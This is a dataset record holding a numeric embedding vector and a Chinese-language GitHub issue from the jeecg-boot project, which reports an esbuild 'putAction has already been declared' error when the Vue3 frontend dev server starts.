0.005093726329505444, -0.0048761144280433655, 0.01472506020218134, -0.0043925330974161625, 0.00024582064361311495, -0.03710683062672615, -0.0023917141370475292, 0.004360294435173273, -0.005678053945302963, 0.006939396262168884, 0.009961781091988087, -0.00042867494630627334, -0.012411927804350853, 0.021922366693615913, -0.019730130210518837, 0.01698983460664749, -0.0027181317564100027, 0.008023425005376339, 0.005690143909305334, -0.001678431173786521, 0.0178763996809721, -0.0024662662763148546, 0.0006906149792484939, -0.01167849637567997, -0.0011696630390360951, 0.01935938373208046, 0.007173127494752407, -0.0156761035323143, 0.026758182793855667, -0.025774899870157242, -0.018214907497167587, 0.021680576726794243, 0.0009238423663191497, -0.00951043888926506, -0.0024924601893872023, -0.0037074589636176825, 0.002998206065967679, 0.0007802791078574955, -0.024888334795832634, -0.003908951301127672, -0.0022184306290000677, 0.027854301035404205, 0.03131996840238571, 0.0020914904307574034, -0.000018087086573359556, -0.000747032871004194, 0.0019202219555154443, -0.02405012585222721, -0.018666250631213188, 0.009703870862722397, 0.04461846500635147, 0.0012210436398163438, -0.004299846477806568, 0.014547746628522873, -0.0009742154506966472, 0.014934612438082695, 0.0017701102187857032, 0.008430439978837967, -0.03881548345088959, 0.01853729598224163, -0.008357902057468891, 0.010912825353443623, -0.014249538071453571, 0.014805656857788563, -0.004356264602392912, -0.004408652428537607, -0.005541039165109396, -0.015587447211146355, 0.008970439434051514, -0.013572524301707745, -0.005218651611357927, 0.0029014896135777235, 0.009478199295699596, 0.026306839659810066, 0.00326014612801373, 0.010896706022322178, -0.0026395495515316725, -0.00020778898033313453, -0.009042976424098015, -0.012822972610592842, -0.0028813404496759176, 0.005210591945797205, 0.017167147248983383, -0.014305955730378628, 0.002994176233187318, -0.0035079815424978733, 0.004295816645026207, -0.004932532552629709, 0.0036248471587896347, 0.005657904781401157, 0.018440578132867813, -0.0036369366571307182, -0.004751189611852169, 0.011477003805339336, 0.023921171203255653, -0.012484465725719929, 0.00490029389038682, -0.0013600733364000916, 0.026580870151519775, -0.013830434530973434, 0.0007707081967964768, 0.00787029042840004, -0.0011424615513533354, 0.006806411314755678, -0.0007651671767234802, -0.018650131300091743, -0.003947235178202391, 0.0038726828061044216, -0.00155652838293463, -0.003943204879760742, -0.0024199229665100574, -0.01808595284819603, -0.0014678717125207186, 0.019520577043294907, 0.007785663940012455, 0.014708940871059895, -0.004561786539852619, 0.010735511779785156, 0.014982970431447029, 0.009502379223704338, -0.014982970431447029, 0.004759249277412891, -0.033367130905389786, 0.01736057922244072, 0.008176559582352638, -0.002845071954652667, -0.00027856315136887133, 0.013620882295072079, 0.020922964438796043, -0.014104464091360569, 0.006810441147536039, -0.0017741400515660644, 0.003256116295233369, -0.002988131484016776, -0.010791929438710213, -0.009260588325560093, 0.0011495137587189674, -0.008672229945659637, -0.000638730707578361, -0.008567454293370247, -0.009115513414144516, 0.0003727608418557793, 0.008156409487128258, -0.01126745156943798, -0.006532381754368544, 0.00887372251600027, -0.011670436710119247, -0.026645347476005554, -0.005585367791354656, 0.03952473774552345, 0.002988131484016776, -0.004344174638390541, 0.022276993840932846, 0.009977900423109531, 0.005230741109699011, 0.000049806389142759144, 0.008704469539225101, -0.013314614072442055, -0.0005692158592864871, -0.02077789045870304, 0.007024023216217756, -0.00014570415078196675, -0.005537009332329035, 0.02807997167110443, 0.014749239198863506, -0.0074914852157235146, -0.0010689168702811003, -0.02559758722782135, -0.0022103709634393454, -0.005887606181204319, 0.007652678992599249, 0.0021378337405622005, 0.003949250094592571, -0.013701478950679302, -0.01119491457939148, -0.002222460461780429, -0.007451186887919903, -0.02280893363058567, -0.024549826979637146, -0.001909139915369451, -0.007987156510353088, -0.017554013058543205, 0.026516392827033997, -0.00033447728492319584, 0.0043079061433672905, -0.008136260323226452, -0.005839248187839985, -0.01284715160727501, -0.04539219290018082, 0.01632894016802311, 0.00019834401609841734, 0.010928944684565067, -0.015192522667348385, -0.005883576348423958, -0.00023234586114995182, -0.007850141264498234, 0.0014930582838132977, 0.005254920106381178, -0.013532225973904133, -0.025549229234457016, -0.016860879957675934, 0.016796400770545006, 0.0011313795112073421, 0.04074981063604355, 0.02056833729147911, 0.005750591401010752, 0.005750591401010752, -0.0021196994930505753, 0.002845071954652667, -0.0004261563008185476, -0.00044504620018415153, -0.014378493651747704, -0.000921323720831424, 0.0243886336684227, 0.005323427729308605, 0.011726854369044304, 0.00009684225369710475, 0.00714088836684823, -0.000026524578061071225, 0.022002963349223137, 0.00303648947738111, 0.013604762963950634, 0.01133192889392376, -0.0037255934439599514, 0.0047229803167283535, -0.011799391359090805, -0.025307437404990196, -0.017473416402935982, -0.025259079411625862, -0.0020914904307574034, 0.01781192235648632, 0.00967969186604023, -0.014031926169991493, 0.013338793069124222, 0.0048761144280433655, 0.0019252593629062176, 0.015788940712809563, -0.013387151062488556, -0.00928476732224226, -0.016973715275526047, 0.005025219172239304, -0.003175519173964858, 0.004513428546488285, 0.02139042690396309, -0.03962145373225212, 0.013161479495465755, 0.008639991283416748, -0.006145516410470009, -0.006032680626958609, -0.008841483853757381, -0.00951043888926506, 0.0008291410049423575, -0.0020350725390017033, -0.014346254989504814, -0.015152224339544773, -0.020858487114310265, 0.000013112743545207195, 0.011170735582709312, 0.008494917303323746, -0.00938954297453165, 0.016062969341874123, -0.004972830880433321, -0.010074617341160774, -0.01243610680103302, -0.030127134174108505, -0.010630736127495766, -0.012339390814304352, -0.0019685800652951, 0.01784416101872921, -0.01798923686146736, -0.020133115351200104, -0.023743856698274612, 0.0034878323785960674, 0.01340327039361, -0.0014285807264968753, 0.0011918272357434034, -0.00942178163677454, -0.026435794308781624, -0.004138652700930834, 0.004682681988924742, 0.00011220604937989265, -0.014854015782475471, 0.02442087233066559, -0.010493720881640911, 0.003987533506006002, 0.0023091023322194815, 0.003943204879760742, -0.01732834056019783, 0.01252476405352354, 0.007136858534067869, -0.011751033365726471, -0.007447157055139542, -0.03949249908328056, -0.017618490383028984, 0.020197592675685883, -0.014112523756921291, -0.006484023295342922, 0.017666848376393318, 0.014265657402575016, -0.013121181167662144, -0.011960585601627827, -0.002697982359677553, 0.01811819151043892, -0.0009137677843682468, 0.02002027817070484, -0.0032641759607940912, 0.024968931451439857, -0.0020753710996359587, 0.012355510145425797, -0.006762083154171705, -0.01200894359499216, 0.004896264057606459, -0.007197306491434574, 0.019230429083108902, -0.004100369289517403, -0.006338948849588633, -0.01158983912318945, 0.028982657939195633, 0.007821932435035706, -0.005669994279742241, -0.003326638601720333, 0.0028007435612380505, -0.004376413766294718, -0.003193653654307127, 0.017279982566833496, 0.000778264191467315, -0.008656110614538193, 0.014426851645112038, 0.0016381327295675874, 0.005476561840623617, -0.0024058185517787933, 0.0024763408582657576, 0.02108415775001049, -0.012000883929431438, -0.018376100808382034, -0.022615499794483185, -0.007225515320897102, -0.015909835696220398, -0.006048799958080053, -0.004581935703754425, 0.013959389179944992, 0.0013308569323271513, -0.0032520864624530077, 0.0021942516323179007, 0.012202376499772072, 0.01808595284819603, 0.011025660671293736, 0.026645347476005554, -0.002716116840019822, 0.007318201940506697, -0.000544533075299114, 0.0031855939887464046, -0.016474014148116112, -0.0015162298223003745, -0.020487740635871887, -0.013572524301707745, -0.012154017575085163, -0.008237007074058056, 0.004174921195954084, 0.008639991283416748, -0.0011303720530122519, 0.015071626752614975, -0.007793723605573177, -0.03820294886827469, -0.013088942505419254, -0.014684761874377728, 0.00868028961122036, 0.02187400870025158, -0.0026617138646543026, 0.0009344207355752587, -0.011025660671293736, -0.006995813921093941, 0.000486855860799551, 0.012419987469911575, 0.03352832421660423, -0.016683565452694893, -0.012702076695859432, 0.009308946318924427, -0.01905311644077301, 0.02866027131676674, 0.00754387304186821, -0.0048076072707772255, -0.015893716365098953, 0.017408939078450203, 0.006060889456421137, 0.003532160772010684, -0.002994176233187318, -0.01258924137800932, 0.023824455216526985, -0.004376413766294718, -0.011565660126507282, -0.0005682084010913968, 0.019730130210518837, -0.008140290156006813, 0.010082677006721497, 0.0019444010686129332, -0.005420144181698561, -0.00607297895476222, 0.016417596489191055, 0.02732236124575138, -0.013080882839858532, 0.015668043866753578, -0.012911628931760788, -0.012508644722402096, -0.007987156510353088, -0.007177157327532768, -0.011428645811975002, 0.02928892709314823, 0.010888646356761456, -0.007624470163136721, -0.00047451446880586445, -0.004602084867656231, 0.0186340119689703, 0.005166263785213232, -0.020616697147488594, 0.015732521191239357, -0.013491926714777946, 0.006931336596608162, 0.015119985677301884, -0.0007011933485046029, 0.001074961619451642, 0.002417908050119877, 0.002502534771338105, 0.0010245885932818055, 0.0016905207885429263, -0.002335296245291829, 0.0020713412668555975, -0.00017806886171456426, -0.002579102059826255, -0.005053428001701832, 0.002321191830560565, -0.030675193294882774, 0.015942074358463287, -0.011485063470900059, -0.004033876582980156, 0.0041547720320522785, -0.02053609862923622, -0.0009510438540019095, 0.014958791434764862, -0.023711618036031723, 0.01711878925561905, -0.039363544434309006, 0.0027483555022627115, 0.046004731208086014, 0.008583573624491692, -0.015184463001787663, -0.004618204664438963, -0.02084236778318882, -0.011275511234998703, -0.00048383348621428013, -0.005508800502866507, -0.0020360799971967936, -0.0014114538207650185, -0.017247743904590607, -0.009437900967895985, 0.006798351649194956, -0.01674804277718067, -0.007237604819238186, 0.010920885019004345, 0.0053758155554533005, -0.049550995230674744, -0.0016240283148363233, 0.005001039709895849, -0.010445362888276577, 0.003604697994887829, 0.004549697041511536, -0.027967136353254318, -0.002607310889288783, 0.01657073013484478, 0.00047350701061077416, 0.009719990193843842, -0.005919844843447208, 0.009502379223704338, 0.012242674827575684, -0.008559394627809525, -0.01808595284819603, -0.004396562930196524, 0.026516392827033997, -0.01698983460664749, -0.00002159745963581372, -0.013798195868730545, 0.013080882839858532, -0.010985362343490124, 0.02787042036652565, 0.0059440238401293755, 0.013870732858777046, 0.008793125860393047, 0.0011021631071344018, -0.03186802938580513, -0.0035744740162044764, -0.0013630957109853625, 0.006193874403834343, 0.008051633834838867, -0.018182668834924698, 0.0027765645645558834, -0.00733029143884778, -0.00729402294382453, -0.014483269304037094, 0.027548031881451607, 0.014386553317308426, -0.012371629476547241, -0.00813223049044609, 0.0077292462810873985, 0.015659984201192856, 0.007237604819238186, -0.01142058614641428, -0.01181551069021225, 0.003274250542744994, 0.023276396095752716, -0.0016341028967872262, -0.0026879077777266502, -0.0023796246387064457, 0.0004861002671532333, -0.01517640333622694, -0.01433013565838337, 0.014547746628522873, -0.0003548783715814352, 0.002425967715680599, 0.003929100465029478, 0.0009958759183064103, -0.00490029389038682, 0.004694771487265825, -0.023518186062574387, 0.0023091023322194815, -0.00890596117824316, 0.004207159858196974, 0.016651326790452003, 0.009486258961260319, -0.008124170824885368, -0.004706860985606909, -0.015732521191239357, -0.012927748262882233, 0.002145893406122923, 0.0038827573880553246, -0.007189246825873852, -0.0014547747559845448, -0.02641967497766018, -0.004847905598580837, 0.002693952526897192, 0.022970126941800117, 0.019472219049930573, -0.014193120412528515, -0.004182980861514807, 0.008406260050833225, 0.006749993190169334, -0.00765670882537961, 0.019182071089744568, 0.012839091941714287, 0.017441177740693092, -0.018488937988877296, 0.006786262150853872, 0.015240880660712719, -0.0013731702929362655, -0.005939994007349014, -0.006995813921093941, 0.01663520745933056, -0.011630137450993061, -0.005907755345106125, 0.01428177673369646, -0.0026113407220691442, -0.001521267113275826, 0.005295218899846077, -0.002627460053190589, -0.014394612982869148, -0.00012933289690408856, 0.0071610379964113235, 0.000907219247892499, 0.009824766777455807, -0.02466266229748726, 0.003503951709717512, -0.016973715275526047, 0.010517899878323078, -0.0022305201273411512, -0.0015555209247395396, -0.004896264057606459, -0.0036449963226914406, -0.008551334962248802, -0.0001926770491991192, 0.0052629797719419, -0.0023191769141703844, -0.008200738579034805, 0.019246548414230347, 0.015232820995151997, 0.0032258923165500164, 0.00799118634313345, 0.004666562657803297, 0.010219691321253777, 0.002726191421970725, 0.00184969964902848, -0.0019413786940276623, 0.003489847294986248, 0.026613108813762665, -0.004404622595757246, 0.001026603509671986, 0.009486258961260319, -0.013354912400245667, 0.011573719792068005, -0.014805656857788563, 0.01142058614641428, 0.01708655059337616, -0.011823570355772972, 0.029917582869529724, 0.008220887742936611, 0.005150144454091787, -0.004251488484442234, 0.013733717612922192, 0.000051160164730390534, -0.02608116902410984, 0.004247458651661873, 0.014418791979551315, 0.00776954460889101, -0.002641564467921853, -0.005327457562088966, -0.013201777823269367, 0.023502066731452942, 0.01233133114874363, -0.01258924137800932, 0.006645217537879944, 0.012057301588356495, 0.013048644177615643, 0.012548943050205708, 0.017183266580104828, 0.00009130121907219291, -0.005931934341788292, -0.004098354373127222, -0.010139094665646553, -0.009357304312288761, -0.010227750986814499, 0.009913423098623753, -0.023276396095752716, -0.004815666936337948, -0.020278189331293106, 0.020584456622600555, 0.004295816645026207, 0.00300223589874804, 0.02580713853240013, -0.021616097539663315, -0.01391909085214138, 0.001346976263448596, 0.0005656897556036711, 0.0129519272595644, 0.003042534226551652, 0.03807399421930313, -0.009961781091988087, 0.006745963357388973, 0.00905909575521946, -0.012726256623864174, 0.007962977513670921, 0.010211631655693054, -0.00047224765876308084, -0.008164470084011555, -0.005730442237108946, 0.0027483555022627115, -0.003576488932594657, -0.01808595284819603, -0.008152379654347897, 0.0029478329233825207, 0.027854301035404205, 0.010767750442028046, 0.028885941952466965, 0.00032012094743549824, -0.013838494196534157, 0.00150111794937402, -0.005367755889892578, -0.00707238120958209, 0.001210968941450119, 0.025823257863521576, 0.002716116840019822, -0.0019030951661989093, 0.0047632791101932526, -0.016079088672995567, 0.014926552772521973, 0.011202974244952202, -0.014104464091360569, 0.0032541013788431883, -0.01391909085214138, -0.013088942505419254, 0.029224449768662453, -0.003028429811820388, 0.01905311644077301, 0.016683565452694893, -0.02956295572221279, -0.007668798323720694, -0.018005356192588806, -0.010501780547201633, 0.009776408784091473, -0.01446714997291565, 0.0017056326614692807, 0.005573278293013573, -0.012162077240645885, 0.017473416402935982, 0.010235810652375221, -0.021406546235084534, -0.00263148988597095, -0.007519694045186043, 0.006822530645877123, 0.003121116431429982, 0.005549098830670118, -0.001598841743543744, 0.005347606725990772, -0.019923562183976173, -0.08620648086071014, -0.001992759294807911, 0.008639991283416748, -0.00018915093096438795, 0.020503859966993332, -0.010735511779785156, 0.013604762963950634, 0.009816707111895084, 0.01469282153993845, -0.0010971258161589503, -0.003723578527569771, -0.02735459990799427, 0.016183864325284958, 0.00563372578471899, 0.006500143092125654, 0.011444765143096447, 0.014878194779157639, 0.01352416630834341, 0.012476406060159206, -0.007636559661477804, -0.00485596526414156, -0.013927150517702103, -0.04123339429497719, -0.011654317378997803, 0.006770142819732428, -0.008341782726347446, 0.024920573458075523, -0.01343550905585289, -0.016232222318649292, -0.0031352208461612463, -0.005383875221014023, 0.010953123681247234, 0.008043574169278145, -0.00007977837231010199, -0.011904167011380196, -0.03630086034536362, 0.013854613527655602, -0.0187790859490633, -0.009534617885947227, -0.004847905598580837, -0.008696409873664379, 0.013604762963950634, -0.004839845933020115, 0.002093505347147584, 0.00024141301400959492, -0.00493656238541007, -0.002770519582554698, 0.005754621233791113, -0.010066557675600052, 0.00014230396482162178, -0.0070280530489981174, 0.013451628386974335, 0.02514624409377575, -0.025242960080504417, -0.010308348573744297, 0.0049607413820922375, -0.008527155965566635, -0.018650131300091743, -0.013387151062488556, -0.010751631110906601, 0.01557132788002491, -0.0012099614832550287, 0.0009727042634040117, -0.005674024112522602, -0.004440891090780497, 0.02053609862923622, 0.012750435620546341, 0.021616097539663315, 0.02766086906194687, -0.004843875765800476, -0.014152822084724903, -0.007056261878460646, 0.011049839667975903, 0.008551334962248802, 0.004424771759659052, -0.0003412776568438858, -0.002049177186563611, 0.004088279791176319, 0.017167147248983383, 0.01615162566304207, 0.018650131300091743, -0.008962378837168217, -0.003528130939230323, -0.010775810107588768, -0.00899461843073368, -0.006347008515149355, 0.004980890545994043, 0.016619088128209114, 0.011033720336854458, 0.005367755889892578, 0.01981072686612606, 0.01358864363282919, -0.00415880186483264, 0.020648935809731483, 0.014781477861106396, 0.002564997412264347, -0.01750565506517887, 0.012419987469911575, 0.008946259506046772, 0.005214621778577566, -0.01440267264842987, -0.0018235057359561324, 0.013048644177615643, -0.001623020856641233, -0.0024904452729970217, -0.01784416101872921, 0.0033629070967435837, -0.01531341765075922, 0.004952681716531515, -0.02429191581904888, 0.016893118619918823, 0.0012724241241812706, 0.010687153786420822, -0.004743129480630159, 0.010477601550519466, 0.0004649435868486762, 0.014579985290765762, 0.007624470163136721, -0.030368926003575325, -0.007564022671431303, -0.010380885563790798, -0.00689103826880455, -0.001637125271372497, 0.0025388034991919994, -0.004646413493901491, -0.006721784360706806, -0.013580583967268467, -0.017279982566833496, -0.017183266580104828, -0.005948053672909737, 0.02714504860341549, 0.004912383388727903, 0.015289238654077053, 0.00967969186604023, 0.001832572859711945, -0.026613108813762665, 0.007338351104408503, -0.015377894975244999, 0.01884356327354908, -0.004315965808928013, -0.003757832106202841, -0.010002079419791698, 0.01384655386209488, 0.0018748862203210592, -0.00864805094897747, 0.005404024384915829, -0.023437589406967163, 0.012726256623864174, 0.0021378337405622005, -0.013016405515372753, 0.003999623004347086, 0.014579985290765762, -0.006794321816414595, 0.003931115381419659, 0.006097158417105675, -0.001179737620986998, 0.024162961170077324, 0.01757013238966465, 0.007906559854745865, -0.005134024657309055, -0.0021418635733425617, 0.004352234769612551, -0.02235759049654007, 0.019133713096380234, -0.011243272572755814, -0.009244468994438648, 0.002544848248362541, -0.006355068646371365, 0.001232125679962337, 0.008551334962248802, 0.0014497373485937715, 0.020826248452067375, -0.0031110418494790792, -0.00739879859611392, -0.013387151062488556, 0.01358864363282919, -0.027241764590144157, -0.01890804059803486, 0.005956113804131746, -0.020697293803095818, 0.0013036554446443915, 0.0026778331957757473, -0.007596261333674192, -0.018617892637848854, -0.0013671255437657237, -0.009051036089658737, 0.007479395717382431, 0.007785663940012455, -0.005621636286377907, 0.013201777823269367, 0.02838624082505703, 0.041330110281705856, -0.0032762654591351748, -0.006512232590466738, 0.0071610379964113235, 0.00964745320379734, -0.011517302133142948, -0.0005017159273847938, -0.013669240288436413, -0.0053999945521354675, 0.008865662850439548, 0.01352416630834341, 0.005645815283060074, -0.0031573849264532328, -0.007692977786064148, -0.010945064015686512, -0.003280295291915536, 0.0007641597185283899, -0.0022083560470491648, 0.0135564049705863, 0.0065283519215881824, -0.010219691321253777, -0.00736253010109067, 0.007519694045186043, -0.005424174014478922, -0.006471933797001839, 0.0007868275861255825, 0.013894911855459213, -0.014031926169991493, 0.03623638302087784, 0.02608116902410984, -0.00096665951423347, 0.024243557825684547, 0.004803577437996864, 0.0041305930353701115, -0.007697007618844509, -0.000027846870580106042, 0.008922080509364605, 0.013967448845505714, 0.019246548414230347, -0.0004342159954831004, -0.00951043888926506, 0.015651924535632133, 0.0137820765376091, -0.0066371578723192215, 0.0074914852157235146, 0.015353715978562832, -0.018182668834924698, 0.00004631175397662446, -0.005347606725990772, 0.029014896601438522, 0.0027946988120675087, -0.001993766753003001, 0.007664768490940332, -0.009687751531600952, 0.01942386105656624, 0.0298369862139225, -0.004015742335468531, 0.006983724422752857, -0.006838649976998568, 0.0017197370762005448, -0.01129969023168087, -0.04471518099308014, 0.01984296552836895, -0.0003203728119842708, 0.004727010149508715, 0.009639393538236618, 0.0064759636297822, -0.01129969023168087, -0.013459688052535057, -0.0016361178131774068, -0.008365961723029613, 0.016909237951040268, 0.004489249549806118, -0.013790136203169823, -0.0008130216156132519, 0.010953123681247234, -0.02466266229748726, 0.00980058778077364, 0.013048644177615643, 0.005847307853400707, -0.0183277428150177, -0.009067155420780182, -0.00036117501440458, -0.006274471525102854, -0.0023070871829986572, -0.003961339592933655, -0.00054805917898193, -0.02353430539369583, -0.011485063470900059, -0.009832826443016529, -0.016336999833583832, -0.011251332238316536, 0.007934768684208393, 0.0037638768553733826, 0.014999089762568474, -0.04062085598707199, -0.014160881750285625, -0.010824168100953102, -0.00868028961122036, 0.0060770087875425816, -0.010695213451981544, -0.00003168781768181361, 0.005162233952432871, -0.021954605355858803, -0.005911785177886486, -0.015031328424811363, -0.0005601486773230135, 0.003870667889714241, 0.007866260595619678, 0.010106856003403664, 0.0019323115702718496, -0.0351402647793293, -0.012186257168650627, 0.015788940712809563, -0.008559394627809525, 0.011879988014698029, 0.008486857637763023, -0.0004871077253483236, 0.014652523212134838, 0.010235810652375221, -0.003741712775081396, -0.0020854456815868616, -0.007326261606067419, 0.007386709097772837, 0.0010538049973547459, -0.007233574986457825, -0.019246548414230347, -0.012395808473229408, -0.01715102791786194, 0.0047632791101932526, 0.004561786539852619, -0.018198788166046143, -0.008833424188196659, -0.004602084867656231, 0.011734914034605026, 0.020229831337928772, -0.003246041713282466, 0.01687699928879738, 0.008277305401861668, 0.027773704379796982, -0.0027967137284576893, -0.03349608555436134, 0.025919973850250244, -0.012468346394598484, 0.007281932979822159, -0.007427007891237736, -0.021180875599384308, -0.029466239735484123, -0.008688349276781082, 0.004835816100239754, 0.007882379926741123, -0.013491926714777946, 0.013346852734684944, 0.003175519173964858, -0.02608116902410984, 0.022825052961707115, -0.010114915668964386, 0.01926266774535179, 0.010542078875005245, -0.01702207326889038, 0.022196395322680473, 0.006741933524608612, 0.007551932707428932, 0.015805060043931007, -0.015668043866753578, -0.013564464636147022, -0.022986246272921562, -0.013540285639464855, -0.0025186543352901936, -0.00971193052828312, -0.01729610189795494, 0.010147154331207275, -0.04584353789687157, -0.020729532465338707, 0.0009414729429408908, 0.009091334417462349, -0.0003916507412213832, 0.016860879957675934, -0.001783207175321877, 0.005351636558771133, -0.019407741725444794, 0.011863868683576584, 0.07266619801521301, 0.009607154875993729, -0.021696696057915688, -0.009977900423109531, 0.012017003260552883, -0.009042976424098015, -0.023743856698274612, 0.05367755889892578, 0.006488053593784571, 0.00868028961122036, 0.01495073176920414, 0.00666536670178175, 0.009155811741948128, -0.004557756707072258, -0.019585056230425835, -0.0178763996809721, 0.017392819747328758, -0.008535215631127357, -0.022067440673708916, 0.012677897699177265, -0.010018198750913143, 0.0009117528679780662, 0.021712815389037132, -0.01981072686612606, -0.00008859366062097251, -0.011509242467582226, -0.009308946318924427, -0.015522969886660576, -0.00508163683116436, 0.03929906710982323, -0.020552217960357666, 0.005456412676721811, 0.00887372251600027, 0.0053314873948693275, -0.006484023295342922, -0.0025287289172410965, -0.014741179533302784, 0.013983568176627159, -0.008728648535907269, -0.012428047135472298, 0.03059459663927555, -0.00485596526414156, 0.010703273117542267, 0.008349842391908169, 0.016482073813676834, -0.009268647991120815, -0.018198788166046143, -0.004811637103557587, -0.011912227608263493, -0.015119985677301884, 0.007277903147041798, 0.008656110614538193, 0.020068638026714325, -0.01856953464448452, 0.004948651883751154, 0.00954267755150795, 0.013572524301707745, 0.00456581637263298, 0.003655071137472987, -0.007592231500893831, 0.004291786812245846, -0.006395366974174976, -0.012113719247281551, 0.005561188794672489, -0.005049398168921471, -0.005275069270282984, -0.008696409873664379, -0.008470738306641579, -0.012726256623864174, 0.002693952526897192, 0.000250480166869238, -0.02253490313887596, -0.006568650249391794, 0.009155811741948128, 0.013959389179944992, -0.015442373231053352, 0.023856693878769875, 0.0013379091396927834, 0.001082013826817274, -0.0031573849264532328, -0.008374021388590336, 0.003078802954405546, -0.021922366693615913, 0.009381483308970928, -0.009018797427415848, 0.005267009604722261, -0.00728596281260252, -0.016828639432787895, -0.022937888279557228, 0.011718794703483582, 0.0015031328657642007, 0.0001724018802633509, -0.015788940712809563, -0.010308348573744297, -0.0031332059297710657, 0.0003357366076670587, 0.0178763996809721, 0.021857889369130135, 0.007559992838650942, -0.024001767858862877, 0.0022002963814884424, 0.00818461924791336, -0.012943867594003677, -0.016973715275526047, -0.02084236778318882, 0.007640589494258165, 0.01715102791786194, 0.0001015017696772702, 0.023502066731452942, -0.027241764590144157, -0.008374021388590336, 0.008019395172595978, -0.0213581882417202, -0.0039673843421041965, -0.0021801472175866365, -0.011742973700165749, 0.01611938700079918, 0.008930140174925327, 0.008015365339815617, -0.020036397501826286, 0.0058996956795454025, 0.015256999991834164, 0.003423354821279645, -0.0011545511661097407, 0.008430439978837967, 0.007350440602749586, 0.0015132074477151036, -0.00034052206319756806, -0.0009203162626363337, 0.04113667458295822, 0.00792670901864767, -0.007326261606067419, -0.004084249958395958, -0.0026194003876298666, 0.024517588317394257, 0.006556560751050711, 0.01055819820612669, 0.0039673843421041965, -0.0051985024474561214, 0.00957491621375084, 0.02081012912094593, 0.0022466396912932396, 0.018069833517074585, -0.003383056493476033, 0.023824455216526985, 0.015394015237689018, 0.0030143253970891237, -0.014394612982869148, 0.033915191888809204, -0.003947235178202391, -0.005174323450773954, -0.005412084050476551, 0.0072053661569952965, 0.006367158144712448, 0.016482073813676834, -0.010324467904865742, -0.01619192399084568, -0.004731039982289076, 0.019214309751987457, 0.020890725776553154, 0.005456412676721811, 0.003832384245470166, 0.007378649432212114, 0.024162961170077324, 0.0187790859490633, -0.03270623832941055, 0.013516106642782688, -0.00283298222348094, -0.0017368639819324017, -0.02266385778784752, 0.007962977513670921, 0.0022909678518772125, -0.0059843226335942745, 0.002093505347147584, -0.012653718702495098, 0.007418947760015726, -0.00006642950756940991, -0.02553310990333557, -0.016038790345191956, -0.003655071137472987, -0.013838494196534157, 0.02159997820854187, 0.011291630566120148, 0.03952473774552345, 0.0018315654015168548, 0.02466266229748726, 0.007019992917776108, 0.016030730679631233, 0.002321191830560565, -0.025468632578849792, 0.013765956275165081, 0.032673999667167664, -0.0022909678518772125, -0.009405662305653095, -0.016522372141480446, -0.006197904236614704, 0.005190442781895399, 0.0025327587500214577, -0.01540207490324974, 0.01133192889392376, 0.007209395989775658, -0.017699087038636208, 0.012025062926113605, 0.016441775485873222, -0.005480591673403978, 0.016764162108302116, -0.0034072354901582003, 0.0011102227726951241, -0.028370121493935585, -0.020729532465338707, 0.014813716523349285 ]
null
null
null
null
null
null
null
null
null
[ "jeecgboot", "jeecg-boot" ]
版本号:3.6.3 分支: master 前端版本: vue3版 问题描述:前端启动报错(npm run serve) 截图&代码: [error1.docx](https://github.com/jeecgboot/jeecg-boot/files/15368520/error1.docx) src/api/manage.js:4:16: error: "putAction" has already been declared 4 │ export function putAction(url,parameter) { ╵ ~~~~~~~~~ src/api/manage.js:1:9: note: "putAction" was originally declared here 1 │ import { putAction } from '@/api/manage' ╵ ~~~~~~~~~ error when starting dev server: Error: Build failed with 1 error: src/api/manage.js:4:16: error: "putAction" has already been declared at failureErrorWithLog (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1493:15) at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1151:28 at runOnEndCallbacks (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:941:63) at buildResponseToResult (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1149:7) at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1258:14 at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:629:9 at handleIncomingPacket (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:726:9) at Socket.readFromStdout (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:596:7) at Socket.emit (node:events:519:28) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖、描述过于简抽象的,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - springboot3_sas分支采用 `Spring Authorization Server` 替换 `Shiro`,目前是beta版不稳定,生产项目不要使用;
前端启动报错
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/6234/comments
0
2024-05-19T07:24:26
2024-05-27T02:03:07Z
https://github.com/jeecgboot/JeecgBoot/issues/6234
2,304,473,880
6,234
false
This is a GitHub Issue repo:jeecg-boot owner:jeecgboot Title : 前端启动报错 Issue date: --- start body --- 版本号:3.6.3 分支: master 前端版本: vue3版 问题描述:前端启动报错(npm run serve) 截图&代码: [error1.docx](https://github.com/jeecgboot/jeecg-boot/files/15368520/error1.docx) src/api/manage.js:4:16: error: "putAction" has already been declared 4 │ export function putAction(url,parameter) { ╵ ~~~~~~~~~ src/api/manage.js:1:9: note: "putAction" was originally declared here 1 │ import { putAction } from '@/api/manage' ╵ ~~~~~~~~~ error when starting dev server: Error: Build failed with 1 error: src/api/manage.js:4:16: error: "putAction" has already been declared at failureErrorWithLog (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1493:15) at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1151:28 at runOnEndCallbacks (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:941:63) at buildResponseToResult (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1149:7) at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:1258:14 at D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:629:9 at handleIncomingPacket (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:726:9) at Socket.readFromStdout (D:\Jeecg for vue3\jeecgboot-vue3-master\node_modules\esbuild\lib\main.js:596:7) at Socket.emit (node:events:519:28) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖、描述过于简抽象的,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - 